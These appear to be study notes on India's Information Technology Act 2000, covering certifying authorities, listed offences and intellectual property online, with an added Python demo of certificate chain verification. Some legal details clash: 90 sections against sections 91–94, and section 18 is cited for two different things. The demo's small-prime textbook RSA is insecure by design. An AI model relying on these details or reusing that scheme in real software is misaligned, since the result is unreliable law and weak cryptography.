government-to-business (G2B) and government-to-government (G2G), as well as back office
processes and interactions within the entire government framework.

Through e-governance, government services are made available to citizens in a convenient,
efficient and transparent manner. The three main target groups that can be distinguished in
governance concepts are government, citizens and businesses/interest groups. In e-governance
there are no distinct boundaries.

Certifying Authority and Controller

Section 18 of The Information Technology Act, 2000 provides the required legal sanctity
to digital signatures based on asymmetric cryptosystems. Digital signatures are now
accepted at par with handwritten signatures, and electronic documents that have been digitally
signed are treated at par with paper documents.

The IT Act provides for the Controller of Certifying Authorities (CCA) to license and regulate the
working of Certifying Authorities. The Certifying Authorities (CAs) issue digital signature
certificates for electronic authentication of users.

The Controller of Certifying Authorities (CCA) has been appointed by the Central Government
under section 17 of the Act for purposes of the IT Act. The Office of the CCA came into
existence on November 1, 2000. It aims at promoting the growth of E-Commerce and
E-Governance through the wide use of digital signatures.

The CCA has established the Root Certifying Authority of India (RCAI) under section 18(b)
of the IT Act to digitally sign the public keys of Certifying Authorities (CAs) in the country.
The RCAI is operated as per the standards laid down under the Act.

The CCA certifies the public keys of CAs using its own private key, which enables users in
cyberspace to verify that a given certificate is issued by a licensed CA. For this purpose it
operates the Root Certifying Authority of India (RCAI). The CCA also maintains the National
Repository of Digital Certificates (NRDC), which contains all the certificates issued by all the
CAs in the country.

A Certifying Authority is a trusted body whose central responsibility is to issue, revoke, renew
and provide directories of Digital Certificates. Certifying Authority means a person who has
been granted a licence to issue an Electronic Signature Certificate under section 24.

Provisions with regard to Certifying Authorities are covered under Chapter VI, i.e. Sec. 17
to Sec. 34 of the IT Act, 2000. It contains detailed provisions relating to the appointment and
powers of the Controller and Certifying Authorities.

Controller of Certifying Authorities (CCA)

The functions of the Controller are –
(a) to exercise supervision over the activities of the Certifying Authorities;
(b) certify public keys of the Certifying Authorities;
(c) lay down the standards to be maintained by the Certifying Authorities;
(d) specify the qualifications and experience which employees of the Certifying
Authorities should possess;
(e) specify the conditions subject to which the Certifying Authorities shall conduct their
business;
(f) specify the content of written, printed or visual material and advertisements that may be
distributed or used in respect of an Electronic Signature Certificate and the Public Key;
(g) specify the form and content of an Electronic Signature Certificate and the key;
(h) specify the form and manner in which accounts shall be maintained by the Certifying
Authorities;
(i) specify the terms and conditions subject to which auditors may be appointed and the
remuneration to be paid to them;
(j) facilitate the establishment of any electronic system by a Certifying Authority either
solely or jointly with other Certifying Authorities and regulation of such systems;
(k) specify the manner in which the Certifying Authorities shall conduct their dealings
with the subscribers;
(l) resolve any conflict of interests between the Certifying Authorities and the subscribers;
(m) lay down the duties of the Certifying Authorities;
(n) maintain a data-base containing the disclosure record of every Certifying Authority
containing such particulars as may be specified by regulations, which shall be accessible to
the public.

The Controller has the power to grant recognition to foreign certifying authorities with
the previous approval of the Central Government, subject to such conditions
and restrictions as may be imposed by regulations.
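
The licensing hierarchy described in this section is a public key infrastructure chain: the root (RCAI) signs the public key of each licensed CA, the CA signs each subscriber's certificate, and a relying party verifies the chain back to the root it trusts and then checks the repository for revocation. The following Python program is an added example for these notes, not code from the page, from the CCA or from any real CA; it uses textbook RSA with small primes and a bare SHA-256 digest purely to stay dependency-free and readable (real CAs use far larger keys with padded signatures), and every name, serial number and the revocation set below is constructed.

```python
import hashlib
import json
from math import gcd, isqrt


def is_prime(n):
    if n < 2:
        return False
    for f in range(2, isqrt(n) + 1):
        if n % f == 0:
            return False
    return True


def next_prime(n):
    while not is_prime(n):
        n += 1
    return n


def make_keypair(start):
    """Textbook RSA keypair from two small primes at or above `start` (demo only)."""
    e = 65537
    p = next_prime(start)
    q = next_prime(p + 1)
    while gcd(e, (p - 1) * (q - 1)) != 1:
        q = next_prime(q + 1)
    d = pow(e, -1, (p - 1) * (q - 1))
    return {"n": p * q, "e": e}, d


def canonical(body):
    """Deterministic byte encoding of a certificate body: this is what gets signed."""
    return json.dumps(body, sort_keys=True).encode()


def digest_mod_n(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data, private_d, pub):
    return pow(digest_mod_n(data, pub["n"]), private_d, pub["n"])


def verify(data, signature, pub):
    return pow(signature, pub["e"], pub["n"]) == digest_mod_n(data, pub["n"])


def issue(issuer, issuer_d, issuer_pub, subject, subject_pub, serial):
    """The issuer certifies `subject_pub` by signing a body naming issuer and subject."""
    body = {"serial": serial, "subject": subject, "issuer": issuer, "public_key": subject_pub}
    return {"body": body, "signature": sign(canonical(body), issuer_d, issuer_pub)}


def verify_chain(subscriber_cert, ca_cert, root_cert, revoked_serials):
    """What a relying party does with a subscriber certificate: walk the chain up
    to the root it trusts, then consult the repository for revocations."""
    root_key = root_cert["body"]["public_key"]
    if not verify(canonical(root_cert["body"]), root_cert["signature"], root_key):
        return False, "root certificate is not validly self-signed"
    # The CA's public key must carry the root's signature: this is the licence.
    if ca_cert["body"]["issuer"] != root_cert["body"]["subject"] or not verify(
            canonical(ca_cert["body"]), ca_cert["signature"], root_key):
        return False, "CA public key not certified by the root: unlicensed CA"
    ca_key = ca_cert["body"]["public_key"]
    if subscriber_cert["body"]["issuer"] != ca_cert["body"]["subject"] or not verify(
            canonical(subscriber_cert["body"]), subscriber_cert["signature"], ca_key):
        return False, "subscriber certificate not issued by the licensed CA, or altered"
    # A valid signature is not enough: the repository may list the certificate as revoked.
    for cert in (ca_cert, subscriber_cert):
        if cert["body"]["serial"] in revoked_serials:
            return False, "certificate %s is revoked" % cert["body"]["serial"]
    return True, "chain valid"


# Constructed demo hierarchy: every name and serial below is hypothetical.
ROOT_PUB, ROOT_D = make_keypair(1_000_000)
CA_PUB, CA_D = make_keypair(2_000_000)
USER_PUB, _USER_D = make_keypair(3_000_000)
ROGUE_PUB, ROGUE_D = make_keypair(4_000_000)

ROOT_CERT = issue("RCAI-root (demo)", ROOT_D, ROOT_PUB, "RCAI-root (demo)", ROOT_PUB, "R-1")
CA_CERT = issue("RCAI-root (demo)", ROOT_D, ROOT_PUB, "Licensed CA (demo)", CA_PUB, "CA-7")
USER_CERT = issue("Licensed CA (demo)", CA_D, CA_PUB, "subscriber@example.invalid", USER_PUB, "S-42")
# A CA that never obtained a licence: self-signed, with no signature from the root.
ROGUE_CA_CERT = issue("Rogue CA (demo)", ROGUE_D, ROGUE_PUB, "Rogue CA (demo)", ROGUE_PUB, "X-1")
ROGUE_USER_CERT = issue("Rogue CA (demo)", ROGUE_D, ROGUE_PUB, "subscriber@example.invalid", USER_PUB, "X-2")


def altered_copy(cert, new_subject):
    """A certificate whose body was edited after signing (signature left as is)."""
    return {"body": dict(cert["body"], subject=new_subject), "signature": cert["signature"]}


if __name__ == "__main__":
    print(verify_chain(USER_CERT, CA_CERT, ROOT_CERT, set()))
    print(verify_chain(ROGUE_USER_CERT, ROGUE_CA_CERT, ROOT_CERT, set()))
    print(verify_chain(USER_CERT, CA_CERT, ROOT_CERT, {"S-42"}))
    print(verify_chain(altered_copy(USER_CERT, "attacker@example.invalid"), CA_CERT, ROOT_CERT, set()))
```

Running it shows the four outcomes a relying party has to distinguish: a valid chain, a certificate from a CA never certified by the root (an unlicensed CA), a validly signed but revoked certificate, and a certificate whose body was altered after signing.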

Offences under IT Act

The Information Technology Act, 2000, also known as the IT Act, is an act passed by the
Indian Parliament and notified on 17th October 2000. It is based
on the United Nations Model Law on Electronic Commerce 1996 (UNCITRAL Model), which
was recommended by the General Assembly of the United Nations by a resolution dated 30th
January, 1997. It is the most important law in India dealing with cybercrime and e-commerce.
The main objective of this act is to enable lawful and trustworthy electronic, digital and online
transactions and to alleviate or reduce cybercrimes. The IT Act has 13 chapters and 90 sections.
The last four sections, 'section 91 – section 94', deal with the revisions to the
Indian Penal Code 1860.

The introduction of the internet has brought tremendous changes to our lives. People in
all fields increasingly use computers to create, transmit and store information in
electronic form instead of on traditional paper documents. Information stored in electronic
form has many advantages: it is cheaper, easier to store, easier to retrieve and faster to
transmit. Though it has many advantages, it has been misused by many people for their own
gain or otherwise to harm others. High-speed connectivity to the world from any place has
given rise to many crimes, and these increasing offences led to the need for a protective law.
Some countries have been rather vigilant and have formed laws governing the net. In order to
keep pace with the changing generation, the Indian Parliament passed the Information
Technology Act 2000. The IT Act 2000 has been conceptualized on the United Nations
Commission on International Trade Law (UNCITRAL) Model Law.

The increasing rate of computer technology led to the enactment of the Information
Technology Act 2000. The conversion of paper work into electronic records and the storage
of electronic data have tremendously changed the scenario of the country. The Act
further amends the Indian Penal Code, 1860, the Evidence Act, 1872, the Bankers' Books
Evidence Act, 1891 and the Reserve Bank of India Act, 1934.
Offences:

Cyber offences are unlawful acts carried out in a very sophisticated manner, in
which the computer is either the tool or the target, or both. Cyber crime usually includes:
(a) Unauthorized access to computers
(b) Data diddling
(c) Virus/worm attacks
(d) Theft of computer systems
(e) Hacking
(f) Denial of service attacks
(g) Logic bombs
(h) Trojan attacks
(i) Internet time theft
(j) Web jacking
(k) Email bombing
(l) Salami attacks
(m) Physically damaging computer systems.

The offences included in the IT Act 2000 are as follows:

1. Tampering with the computer source documents.
2. Hacking with computer system.
3. Publishing of information which is obscene in electronic form.
4. Power of Controller to give directions
5. Directions of Controller to a subscriber to extend facilities to decrypt information
6. Protected system
7. Penalty for misrepresentation
8. Penalty for breach of confidentiality and privacy
9. Penalty for publishing Digital Signature Certificate false in certain particulars
10. Publication for fraudulent purpose
11. Act to apply for offence or contravention committed outside India
12. Confiscation
13. Penalties or confiscation not to interfere with other punishments.
14. Power to investigate offences.

Intellectual Property Rights in Cyberspace

Intellectual Property (IP) simply refers to creations of the mind. It refers to the
possession of a thought or design by the one who came up with it. It offers the owner of any
inventive design or any form of distinct work certain exclusive rights that make it unlawful to
copy or reuse that work without the owner's permission. It is a part of property law. People
associated with literature, music, invention, etc. can use it in business practices.

There are numerous types of tools of protection that come under the term "intellectual
property". Notable among these are the following:

• Patent
• Trademark
• Geographical indications
• Layout designs of integrated circuits
• Trade secrets
• Copyrights
• Industrial designs

Cyberspace is the non-physical domain where numerous computers are connected through
computer networks to establish communication between them. With the expansion of
technology, cyberspace has come within reach of every individual. This has led to the
emergence of cyberspace as a business platform and hence increased pressure on intellectual
property. Nowadays, cyber crimes do not limit themselves to fraud, cyberbullying and
identity theft, but also include infringement of the copyrights and trademarks of various businesses
and other organizations. Online content needs to be protected, and hence Intellectual Property
Rights and cyber laws cannot be separated.

In cyberspace, sometimes one person makes a profit by using another person’s creation
without the owner’s consent. This is a violation of privacy, and it is protected by IPR. We
have certain laws to avoid violation of Intellectual Property Rights in cyberspace and when it
is violated, then additionally we have several remedies in law.
